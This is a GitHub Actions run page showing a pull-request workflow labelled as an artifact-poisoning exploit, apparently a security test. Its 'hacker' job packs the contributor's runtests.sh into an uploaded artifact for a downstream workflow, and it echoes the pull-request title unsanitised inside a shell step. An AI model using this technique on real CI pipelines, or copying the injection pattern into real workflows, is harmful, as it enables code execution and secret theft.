Skip to content

external (read) user: exploit Artifact Poisoning #6

external (read) user: exploit Artifact Poisoning

external (read) user: exploit Artifact Poisoning #6

Workflow file for this run

name: Build CI
on:
pull_request:
branches: [ main ]
env:
MY_SECRET: ${{ secrets.MY_SECRET }}
jobs:
hacker_build_and_upload:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Building ...
run: |
mkdir -p ./bin
touch ./bin/mybin.exe
cat runtests.sh
cp runtests.sh ./bin
echo "${{github.event.pull_request.title}}" > ./bin/PR_TITLE.txt
echo "${{github.event.number}}" > ./bin/PR_ID.txt
- name: Archive building artifacts
uses: actions/upload-artifact@v3
with:
name: archive-bin
path: |
bin